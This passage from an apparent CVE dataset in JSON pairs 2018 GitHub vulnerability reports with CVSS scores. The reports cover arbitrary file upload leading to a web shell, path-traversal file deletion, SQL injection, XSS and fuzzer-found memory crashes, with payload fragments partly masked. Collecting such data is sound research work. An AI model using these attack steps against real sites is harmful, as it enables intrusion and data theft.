  20472. "severity": "MEDIUM",
  20473. "baseScore": 6.1,
  20474. "impactScore": 2.7,
  20475. "exploitabilityScore": 2.8
  20476. },
  20477. {
  20478. "CVE_ID": "CVE-2018-12051",
  20479. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/5",
  20480. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/5",
  20481. "Repo_new": "unh3x/just4cve",
  20482. "Issue_Created_At": "2018-06-07T08:36:17Z",
  20483. "description": "Schools Alert Management Script Arbitrary File Upload. ================= Schools Alert Management Script Arbitrary File Upload ================= Date NUMBERTAG endor Homepage: FILETAG Software Link: URLTAG Category: Web Application Exploit Author: M3 MENTIONTAG From APITAG Tested on: Linux Mint CVE: assign for cve ================= Vulnerable cgi: ================= FILETAG ================= Proof of Concept: ================= ERRORTAG FILETAG FILETAG . Shell is shown in response data, just enjoy it. .",
  20484. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20485. "severity": "CRITICAL",
  20486. "baseScore": 9.8,
  20487. "impactScore": 5.9,
  20488. "exploitabilityScore": 3.9
  20489. },
  20490. {
  20491. "CVE_ID": "CVE-2018-12053",
  20492. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/6",
  20493. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/6",
  20494. "Repo_new": "unh3x/just4cve",
  20495. "Issue_Created_At": "2018-06-07T08:56:29Z",
  20496. "description": "Schools Alert Management Script Arbitrary File Deletion. ================= Schools Alert Management Script Arbitrary File Deletion ================= Date NUMBERTAG endor Homepage: FILETAG Software Link: URLTAG Category: Web Application Exploit Author: M3 MENTIONTAG From APITAG CVE: assign for cve ================= Vulnerable cgi: ================= FILETAG ================= Proof of Concept: ================= APITAG notice: There is a risk of file deletion\uff0cyou'd better test it combined with the further file upload vulnerability. Attackers can delete any file through parameter 'img' with '../' .",
  20497. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  20498. "severity": "HIGH",
  20499. "baseScore": 7.5,
  20500. "impactScore": 3.6,
  20501. "exploitabilityScore": 3.9
  20502. },
  20503. {
  20504. "CVE_ID": "CVE-2018-12054",
  20505. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/4",
  20506. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/4",
  20507. "Repo_new": "unh3x/just4cve",
  20508. "Issue_Created_At": "2018-06-07T02:03:32Z",
  20509. "description": "Schools Alert Management Script Arbitrary File Read. ================= Schools Alert Management Script Arbitrary File Read ================= Date NUMBERTAG endor Homepage: FILETAG Software Link: URLTAG Category: Web Application Exploit Author: M3 MENTIONTAG From APITAG Tested on: Linux Mint CVE: assign for cve ================= Vulnerable cgi: ================= FILETAG ================= Proof of Concept: ================= APITAG FILETAG",
  20510. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  20511. "severity": "HIGH",
  20512. "baseScore": 7.5,
  20513. "impactScore": 3.6,
  20514. "exploitabilityScore": 3.9
  20515. },
  20516. {
  20517. "CVE_ID": "CVE-2018-12055",
  20518. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/2",
  20519. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/2",
  20520. "Repo_new": "unh3x/just4cve",
  20521. "Issue_Created_At": "2018-06-06T23:57:11Z",
  20522. "description": "Schools Alert Management Script Multiple SQL Injections. ================= Exploit Title: Schools Alert Management Script SQL Injections Date NUMBERTAG endor Homepage: FILETAG Software Link: URLTAG Category: Web Application Exploit Author: M3 MENTIONTAG From APITAG Tested on: Linux Mint CVE: assign for cve ================= Vulnerable cgi NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG ================= Proof of Concept ================= POST URLTAG FILETAG",
  20523. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20524. "severity": "CRITICAL",
  20525. "baseScore": 9.8,
  20526. "impactScore": 5.9,
  20527. "exploitabilityScore": 3.9
  20528. },
  20529. {
  20530. "CVE_ID": "CVE-2018-12065",
  20531. "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/152",
  20532. "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/152",
  20533. "Repo_new": "creatiwity/witycms",
  20534. "Issue_Created_At": "2018-06-08T06:35:41Z",
  20535. "description": "The Local File Inclusion vulnerability in PATHTAG I found a local file inclusion vulnerability. An attacker might include local PHP files or read non-PHP files with this vulnerability. Reference: URLTAG",
  20536. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20537. "severity": "CRITICAL",
  20538. "baseScore": 9.8,
  20539. "impactScore": 5.9,
  20540. "exploitabilityScore": 3.9
  20541. },
  20542. {
  20543. "CVE_ID": "CVE-2018-12085",
  20544. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/595",
  20545. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/595",
  20546. "Repo_new": "liblouis/liblouis",
  20547. "Issue_Created_At": "2018-06-05T21:09:49Z",
  20548. "description": "APITAG stack based buffer overflow APITAG in NUMBERTAG in APITAG FILETAG Tested commit: APITAG Credit: Henri Salo Tools: american fuzzy lop URLTAG NUMBERTAG b, afl utils URLTAG Thanks to Kapsi internet k\u00e4ytt\u00e4j\u00e4t ry for providing valuable fuzzing resources. ERRORTAG",
  20549. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20550. "severity": "HIGH",
  20551. "baseScore": 8.8,
  20552. "impactScore": 5.9,
  20553. "exploitabilityScore": 2.8
  20554. },
  20555. {
  20556. "CVE_ID": "CVE-2018-12089",
  20557. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4628",
  20558. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4628",
  20559. "Repo_new": "octopusdeploy/issues",
  20560. "Issue_Created_At": "2018-06-11T05:39:23Z",
  20561. "description": "SF Target prints password in clear text. Scenario: Service Fabric Cluster Target Configured with Azure Active Directory security mode APITAG set to true Password from will be printed in clear text in the log file Vulnerable in versions NUMBERTAG APITAG Fixed in NUMBERTAG",
  20562. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  20563. "severity": "HIGH",
  20564. "baseScore": 7.5,
  20565. "impactScore": 5.9,
  20566. "exploitabilityScore": 1.6
  20567. },
  20568. {
  20569. "CVE_ID": "CVE-2018-12092",
  20570. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/78",
  20571. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/78",
  20572. "Repo_new": "syoyo/tinyexr",
  20573. "Issue_Created_At": "2018-06-10T08:47:01Z",
  20574. "description": "Heap buffer overflow in APITAG git log commit APITAG Author: Syoyo Fujita APITAG Date: Thu Jun NUMBERTAG I build tinyexr with clang and address sanitizer. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a heap buffer overflow has triggered. Address sanitizer provided information as below NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a NUMBERTAG b NUMBERTAG d at pc NUMBERTAG b bp NUMBERTAG ffe8c NUMBERTAG dd NUMBERTAG sp NUMBERTAG ffe8c NUMBERTAG dd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG a NUMBERTAG b NUMBERTAG d thread T NUMBERTAG a in APITAG char , int const , unsigned char const , unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, APITAG const , unsigned long, APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const&) PATHTAG NUMBERTAG in APITAG , APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const&, unsigned char const , unsigned long) PATHTAG NUMBERTAG fd4 in APITAG PATHTAG NUMBERTAG a8a in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG f5 in main PATHTAG NUMBERTAG f2ff6d NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG NUMBERTAG a NUMBERTAG b NUMBERTAG d is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG in operator new(unsigned long) PATHTAG NUMBERTAG b3 in APITAG char>::allocate(unsigned long, void const ) PATHTAG NUMBERTAG b3 in APITAG char> APITAG char>&, unsigned long) PATHTAG NUMBERTAG b3 in APITAG char, std::allocator<unsigned char> >::_M_allocate(unsigned long) PATHTAG NUMBERTAG b3 in APITAG char, std::allocator<unsigned char> >::_M_create_storage(unsigned long) PATHTAG NUMBERTAG b3 in APITAG char, std::allocator<unsigned char> APITAG long, std::allocator<unsigned char> const&) PATHTAG NUMBERTAG b3 in std::vector<unsigned char, std::allocator<unsigned char> 
>::vector(unsigned long, std::allocator<unsigned char> const&) PATHTAG NUMBERTAG b3 in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG char , int const , unsigned char const , unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, APITAG const , unsigned long, APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const&) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING Load EXR err: Failed to parse channel APITAG NUMBERTAG",
  20575. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20576. "severity": "CRITICAL",
  20577. "baseScore": 9.8,
  20578. "impactScore": 5.9,
  20579. "exploitabilityScore": 3.9
  20580. },
  20581. {
  20582. "CVE_ID": "CVE-2018-12093",
  20583. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/79",
  20584. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/79",
  20585. "Repo_new": "syoyo/tinyexr",
  20586. "Issue_Created_At": "2018-06-10T08:48:05Z",
  20587. "description": "Memory leaks in APITAG git log commit APITAG Author: Syoyo Fujita APITAG Date: Thu Jun NUMBERTAG I build tinyexr with clang and leak sanitizer. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), sanitizer detected memory leaks in APITAG . Leak sanitizer provided information as below NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG in strdup PATHTAG NUMBERTAG a6a7 in APITAG PATHTAG NUMBERTAG cd in APITAG PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s)",
  20588. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  20589. "severity": "HIGH",
  20590. "baseScore": 7.5,
  20591. "impactScore": 3.6,
  20592. "exploitabilityScore": 3.9
  20593. },
  20594. {
  20595. "CVE_ID": "CVE-2018-12101",
  20596. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/496",
  20597. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/496",
  20598. "Repo_new": "clippercms/clippercms",
  20599. "Issue_Created_At": "2019-08-05T20:58:58Z",
  20600. "description": "HTML injection is found in CMS Clipper NUMBERTAG ersion. HTML injection found in the APITAG name\" field in CMS Clipper NUMBERTAG APITAG module name value is obtained from the user,it is getting saved and displayed without any sanitation. Affected URL: URLTAG Steps to reproduce: APITAG Security >> Manager Permissions >> User Groups NUMBERTAG Create New user group using APITAG is Prasad Lingamaiah APITAG ! APITAG NUMBERTAG Goto the APITAG Group links and html script will execute For your reference: FILETAG FILETAG",
  20601. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  20602. "severity": "MEDIUM",
  20603. "baseScore": 5.4,
  20604. "impactScore": 2.7,
  20605. "exploitabilityScore": 2.3
  20606. },
  20607. {
  20608. "CVE_ID": "CVE-2018-12101",
  20609. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/487",
  20610. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/487",
  20611. "Repo_new": "clippercms/clippercms",
  20612. "Issue_Created_At": "2018-06-10T20:09:24Z",
  20613. "description": "XSS. XSS is found in the APITAG name\" field in CMS Clipper NUMBERTAG ersion. The Security name value is obtained from the webusers, having search parameter for user list. it is getting reflected and displayed without any sanitation. Affected URL: URLTAG Steps to POC NUMBERTAG access the URL URLTAG NUMBERTAG Under Security tab, click on web users >>search parameter NUMBERTAG in search parameter enter XSS payload '\">> APITAG APITAG APITAG \"> APITAG APITAG APITAG and click on GO button APITAG script is getting executed. For your reference: FILETAG FILETAG FILETAG FILETAG FILETAG Mitigation: Sanitize HTML Markup with a Library Designed for the Job Never Insert Untrusted Data Except in Allowed Locations HTML Escape Before Inserting Untrusted Data into HTML Element Content Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes URLTAG",
  20614. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  20615. "severity": "MEDIUM",
  20616. "baseScore": 5.4,
  20617. "impactScore": 2.7,
  20618. "exploitabilityScore": 2.3
  20619. },
  20620. {
  20621. "CVE_ID": "CVE-2018-12101",
  20622. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/488",
  20623. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/488",
  20624. "Repo_new": "clippercms/clippercms",
  20625. "Issue_Created_At": "2018-06-10T20:32:47Z",
  20626. "description": "Stored XSS in Manager Permissions. Stored XSS is found in the APITAG Permissions\" field in CMS Clipper NUMBERTAG ersion. The Manager Permissions value is obtained from the User Groups, Resource Groups and Users/resource group links. which having adding users list and groups list. it is getting stored and displayed without any sanitation. Affected URL: URLTAG Steps to POC NUMBERTAG access the URL URLTAG NUMBERTAG Under Security tab, click on Manager Permissions APITAG Groups in User Groups parameter try to Create a new Users Group XSS payload APITAG '\"> and click on submit button APITAG script is getting executed NUMBERTAG Under Security tab, click on Manager Permissions APITAG Groups in User Groups parameter try to Create a new Resource Group XSS payload APITAG '\"> and click on submit button APITAG script is getting executed NUMBERTAG Users/resource group links submit the XSS payload which we have saved. For your reference: FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG Mitigation: Sanitize HTML Markup with a Library Designed for the Job Never Insert Untrusted Data Except in Allowed Locations HTML Escape Before Inserting Untrusted Data into HTML Element Content Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes URLTAG",
  20627. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  20628. "severity": "MEDIUM",
  20629. "baseScore": 5.4,
  20630. "impactScore": 2.7,
  20631. "exploitabilityScore": 2.3
  20632. },
  20633. {
  20634. "CVE_ID": "CVE-2018-12102",
  20635. "Issue_Url_old": "https://github.com/mity/md4c/issues/41",
  20636. "Issue_Url_new": "https://github.com/mity/md4c/issues/41",
  20637. "Repo_new": "mity/md4c",
  20638. "Issue_Created_At": "2018-06-11T03:31:18Z",
  20639. "description": "NULL pointer dereference in APITAG i find a Segmentation fault, when i used md2html. ./md2html github crash1 it is a NULL pointer dereference in URLTAG ctx >current_block is a null pointer. but i find you did the assert in URLTAG don't know why it does not work. i just git clone it and use cmake . and make to build it. CODETAG this is the crash file : FILETAG",
  20640. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20641. "severity": "MEDIUM",
  20642. "baseScore": 5.5,
  20643. "impactScore": 3.6,
  20644. "exploitabilityScore": 1.8
  20645. },
  20646. {
  20647. "CVE_ID": "CVE-2018-12104",
  20648. "Issue_Url_old": "https://github.com/airbnb/knowledge-repo/issues/431",
  20649. "Issue_Url_new": "https://github.com/airbnb/knowledge-repo/issues/431",
  20650. "Repo_new": "airbnb/knowledge-repo",
  20651. "Issue_Created_At": "2018-06-10T10:17:29Z",
  20652. "description": "XSS vulnerability. Auto reviewers: MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG Hello, guys! There is a cross site scripting (XSS) vulnerability in the Knowledge Repo NUMBERTAG other versions may be affected as well) which allows remote attackers to inject arbitrary APITAG via post comments functionality. Steps to reproduce: Just open any post like this FILETAG and add the following code as a APITAG APITAG side attacks is possible here!\"); APITAG Impact: An unauthenticated evil user can leverage the vulnerability to conduct various types of client side attacks, for example, conducting a browser mining, redirecting users to malicious sites or hijacking the user\u2019s browser using malware. As an irrefutable evidence please take a look at the attached screen shot. Mitigation: Details on how to prevent XSS can be found here: URLTAG APITAG FILETAG",
  20653. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  20654. "severity": "MEDIUM",
  20655. "baseScore": 6.1,
  20656. "impactScore": 2.7,
  20657. "exploitabilityScore": 2.8
  20658. },
  20659. {
  20660. "CVE_ID": "CVE-2018-12108",
  20661. "Issue_Url_old": "https://github.com/dropbox/lepton/issues/107",
  20662. "Issue_Url_new": "https://github.com/dropbox/lepton/issues/107",
  20663. "Repo_new": "dropbox/lepton",
  20664. "Issue_Created_At": "2018-06-09T13:49:30Z",
  20665. "description": "Program received signal SIGFPE, Arithmetic exception. . Hi, all. This malformed lepton file can cause crash. Program received signal SIGFPE, Arithmetic exception. This is the FILETAG . ERRORTAG Here is the gdb information: CODETAG",
  20666. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20667. "severity": "MEDIUM",
  20668. "baseScore": 5.5,
  20669. "impactScore": 3.6,
  20670. "exploitabilityScore": 1.8
  20671. },
  20672. {
  20673. "CVE_ID": "CVE-2018-12109",
  20674. "Issue_Url_old": "https://github.com/FLIF-hub/FLIF/issues/513",
  20675. "Issue_Url_new": "https://github.com/flif-hub/flif/issues/513",
  20676. "Repo_new": "flif-hub/flif",
  20677. "Issue_Created_At": "2018-06-10T09:04:50Z",
  20678. "description": "FLIF crash with specific image: heap buffer overflow. Hi, all. This PAM image file can cause a crash due to a heap buffer overflow. Here is the ASAN result and I attached the FILETAG . Thanks. Execute the following command: APITAG ASAN result: ERRORTAG",
  20679. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20680. "severity": "HIGH",
  20681. "baseScore": 7.8,
  20682. "impactScore": 5.9,
  20683. "exploitabilityScore": 1.8
  20684. },
  20685. {
  20686. "CVE_ID": "CVE-2018-12110",
  20687. "Issue_Url_old": "https://github.com/oyeahtime/test/issues/2",
  20688. "Issue_Url_new": "https://github.com/oyeahtime/test/issues/2",
  20689. "Repo_new": "oyeahtime/test",
  20690. "Issue_Created_At": "2018-06-11T01:28:26Z",
  20691. "description": "APITAG sql injection. APITAG is a free open source project written in PHP. There is a SQL injection vulnerability in portfoliocms. We can get the source code here: URLTAG The SQL injection can be triggered like this: NUMBERTAG install portfoliocms, for example: URLTAG the sql injection payload: URLTAG and NUMBERTAG union all select APITAG NUMBERTAG FILETAG",
  20692. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  20693. "severity": "HIGH",
  20694. "baseScore": 7.2,
  20695. "impactScore": 5.9,
  20696. "exploitabilityScore": 1.2
  20697. },
  20698. {
  20699. "CVE_ID": "CVE-2018-12112",
  20700. "Issue_Url_old": "https://github.com/mity/md4c/issues/42",
  20701. "Issue_Url_new": "https://github.com/mity/md4c/issues/42",
  20702. "Repo_new": "mity/md4c",
  20703. "Issue_Created_At": "2018-06-11T09:09:38Z",
  20704. "description": "heap_overflow in function md_build_attribute APITAG commit cb7ecd7 ./md2html github crash2 in function md_build_attribute , URLTAG The raw_size is too large, which causes a heap overflow ERRORTAG poc file: FILETAG",
  20705. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20706. "severity": "HIGH",
  20707. "baseScore": 7.8,
  20708. "impactScore": 5.9,
  20709. "exploitabilityScore": 1.8
  20710. },
  20711. {
  20712. "CVE_ID": "CVE-2018-12229",
  20713. "Issue_Url_old": "https://github.com/pkp/pkp-lib/issues/3785",
  20714. "Issue_Url_new": "https://github.com/pkp/pkp-lib/issues/3785",
  20715. "Repo_new": "pkp/pkp-lib",
  20716. "Issue_Created_At": "2018-06-11T18:53:52Z",
  20717. "description": "Correct missing escaping of template variable. The APITAG variable in APITAG is not escaped.",
  20718. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  20719. "severity": "MEDIUM",
  20720. "baseScore": 6.1,
  20721. "impactScore": 2.7,
  20722. "exploitabilityScore": 2.8
  20723. },
  20724. {
  20725. "CVE_ID": "CVE-2018-12247",
  20726. "Issue_Url_old": "https://github.com/mruby/mruby/issues/4036",
  20727. "Issue_Url_new": "https://github.com/mruby/mruby/issues/4036",
  20728. "Repo_new": "mruby/mruby",
  20729. "Issue_Created_At": "2018-06-05T19:02:11Z",
  20730. "description": "Null pointer dereference in mrb_class. The following input demonstrates a crash: APITAG Note that I was only able to reproduce this issue when building mruby on a NUMBERTAG bit Linux system. (I used Ubuntu NUMBERTAG for testing.) I could not reproduce on NUMBERTAG bit Linux or NUMBERTAG bit APITAG Valgrind report: ERRORTAG This issue was reported by URLTAG",
  20731. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  20732. "severity": "HIGH",
  20733. "baseScore": 7.5,
  20734. "impactScore": 3.6,
  20735. "exploitabilityScore": 3.9
  20736. },
  20737. {
  20738. "CVE_ID": "CVE-2018-12248",
  20739. "Issue_Url_old": "https://github.com/mruby/mruby/issues/4038",
  20740. "Issue_Url_new": "https://github.com/mruby/mruby/issues/4038",
  20741. "Repo_new": "mruby/mruby",
  20742. "Issue_Created_At": "2018-06-05T22:08:03Z",
  20743. "description": "Heap buffer overflow in OP_ENTER. The following input demonstrates a crash: CODETAG This issue looks similar to NUMBERTAG ASAN report: ERRORTAG This issue was reported by Daniel Teuchert, Cornelius Aschermann, Tommaso Frassetto and Tigist Abera ( URLTAG",
  20744. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  20745. "severity": "HIGH",
  20746. "baseScore": 7.5,
  20747. "impactScore": 3.6,
  20748. "exploitabilityScore": 3.9
  20749. },
  20750. {
  20751. "CVE_ID": "CVE-2018-12249",
  20752. "Issue_Url_old": "https://github.com/mruby/mruby/issues/4037",
  20753. "Issue_Url_new": "https://github.com/mruby/mruby/issues/4037",
  20754. "Repo_new": "mruby/mruby",
  20755. "Issue_Created_At": "2018-06-05T19:26:59Z",
  20756. "description": "Null pointer dereference in mrb_class_real. The following input demonstrates a crash: APITAG ASAN report: ERRORTAG This issue was reported by Daniel Teuchert, Cornelius Aschermann, Tommaso Frassetto and Tigist Abera ( URLTAG",
  20757. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  20758. "severity": "HIGH",
  20759. "baseScore": 7.5,
  20760. "impactScore": 3.6,
  20761. "exploitabilityScore": 3.9
  20762. },
  20763. {
  20764. "CVE_ID": "CVE-2018-12263",
  20765. "Issue_Url_old": "https://github.com/oyeahtime/test/issues/3",
  20766. "Issue_Url_new": "https://github.com/oyeahtime/test/issues/3",
  20767. "Repo_new": "oyeahtime/test",
  20768. "Issue_Created_At": "2018-06-12T06:48:13Z",
  20769. "description": "APITAG file upload. APITAG is a free open source project written in PHP. There is an arbitrary file upload vulnerability in portfoliocms. We can get the source code here: URLTAG file upload poc: URLTAG we can upload a php shell FILETAG connect the shell FILETAG",
  20770. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  20771. "severity": "HIGH",
  20772. "baseScore": 8.8,
  20773. "impactScore": 5.9,
  20774. "exploitabilityScore": 2.8
  20775. },
  20776. {
  20777. "CVE_ID": "CVE-2018-12264",
  20778. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/366",
  20779. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/366",
  20780. "Repo_new": "exiv2/exiv2",
  20781. "Issue_Created_At": "2018-06-11T11:33:59Z",
  20782. "description": "out of bound read in function std::memcpy (tmp, buf, len) in PATHTAG PATHTAG ./exi NUMBERTAG ep NUMBERTAG out of read Poc Warning: Directory Image, entry NUMBERTAG Strip NUMBERTAG is outside of the data area; ignored. Segmentation fault (core dumped) PATHTAG gdb q exi NUMBERTAG APITAG Reading symbols from APITAG APITAG LWP NUMBERTAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Core was generated by `./exi NUMBERTAG ep NUMBERTAG out of read Poc'. Program terminated with signal SIGSEGV, Segmentation fault NUMBERTAG memcpy_avx_unaligned () at PATHTAG NUMBERTAG PATHTAG No such file or directory. gdb peda$ bt NUMBERTAG memcpy_avx_unaligned () at PATHTAG NUMBERTAG fe NUMBERTAG af NUMBERTAG in APITAG APITAG (this NUMBERTAG e NUMBERTAG c NUMBERTAG buf NUMBERTAG fe NUMBERTAG c3ff7 <error: Cannot access memory at address NUMBERTAG fe NUMBERTAG c3ff7>, len NUMBERTAG at PATHTAG NUMBERTAG fe NUMBERTAG e0c1 in (anonymous APITAG (this NUMBERTAG e NUMBERTAG at PATHTAG NUMBERTAG fe NUMBERTAG a in APITAG (this NUMBERTAG ffc NUMBERTAG e9c NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG in APITAG (this NUMBERTAG e0ec NUMBERTAG at PATHTAG NUMBERTAG b6 in APITAG (this NUMBERTAG e0ec NUMBERTAG path NUMBERTAG out of read Poc\") at PATHTAG NUMBERTAG cd in main (argc NUMBERTAG arg NUMBERTAG ffc NUMBERTAG e9c NUMBERTAG at PATHTAG NUMBERTAG fe NUMBERTAG in __libc_start_main (main NUMBERTAG main(int, char const )>, argc NUMBERTAG arg NUMBERTAG ffc NUMBERTAG e9c NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG ffc NUMBERTAG e9c NUMBERTAG at PATHTAG NUMBERTAG in _start () Poc: URLTAG",
  20783. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20784. "severity": "HIGH",
  20785. "baseScore": 8.8,
  20786. "impactScore": 5.9,
  20787. "exploitabilityScore": 2.8
  20788. },
  20789. {
  20790. "CVE_ID": "CVE-2018-12265",
  20791. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/365",
  20792. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/365",
  20793. "Repo_new": "exiv2/exiv2",
  20794. "Issue_Created_At": "2018-06-11T09:50:59Z",
  20795. "description": "out of bound read when extracting preview images from the Poc file . PATHTAG ./exi NUMBERTAG ep1 PATHTAG Error: Upper boundary of data for directory Image, entry NUMBERTAG fe is out of bounds: Offset NUMBERTAG a, size NUMBERTAG exceeds buffer size by NUMBERTAG Bytes; truncating the entry Warning: Directory Image, entry NUMBERTAG Strip NUMBERTAG is outside of the data area; ignored. Warning: Directory Image, entry NUMBERTAG Strip NUMBERTAG is outside of the data area; ignored. Error: Offset of directory Thumbnail, entry NUMBERTAG is out of bounds: Offset NUMBERTAG truncating the entry Segmentation fault (core dumped) PATHTAG gdb q exi NUMBERTAG APITAG Reading symbols from APITAG New LWP NUMBERTAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Core was generated by `./exi NUMBERTAG ep1 APITAG NUMBERTAG Program terminated with signal SIGSEGV, Segmentation fault NUMBERTAG memcpy_avx_unaligned () at PATHTAG NUMBERTAG PATHTAG No such file or directory. gdb peda$ bt NUMBERTAG memcpy_avx_unaligned () at PATHTAG NUMBERTAG f NUMBERTAG ccde NUMBERTAG in APITAG (this NUMBERTAG buf NUMBERTAG ffda NUMBERTAG e NUMBERTAG h8,pos NUMBERTAG rcount NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG cce NUMBERTAG f NUMBERTAG in APITAG APITAG advance NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG cce2cc NUMBERTAG in APITAG (io=...) at PATHTAG NUMBERTAG f NUMBERTAG cce2c9b7 in APITAG (data NUMBERTAG f NUMBERTAG cd4b7fff <error: Cannot access memory at address NUMBERTAG f NUMBERTAG cd4b7fff>, size NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG cce NUMBERTAG in (anonymous APITAG (this NUMBERTAG at 